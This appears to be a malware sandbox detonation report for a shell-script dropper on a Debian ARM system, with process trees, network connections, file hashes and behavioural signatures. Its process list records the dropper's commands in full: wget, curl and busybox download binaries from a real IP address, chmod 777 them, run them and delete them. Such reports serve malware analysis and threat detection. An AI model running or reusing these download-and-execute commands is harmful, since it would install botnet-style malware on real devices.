| File opened for modification | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
Processes
/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh
[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/chmod
[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV
[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/rm
[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/wget
[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/chmod
[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783
[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/rm
[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/wget
[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/chmod
[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17
[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/rm
[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/wget
[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/chmod
[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF
[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/rm
[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/wget
[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/chmod
[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug
[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/rm
[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/wget
[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/chmod
[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF
[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/rm
[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/wget
[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/chmod
[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug
[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/rm
[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/chmod
[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV
[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/rm
[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/wget
[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/chmod
[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783
[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/rm
[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/wget
[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/chmod
[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17
[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/rm
[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 151.101.1.91:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 02:45
Reported
2024-11-20 02:48
Platform
debian9-armhf-20240611-en
Max time kernel
30s
Max time network
34s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
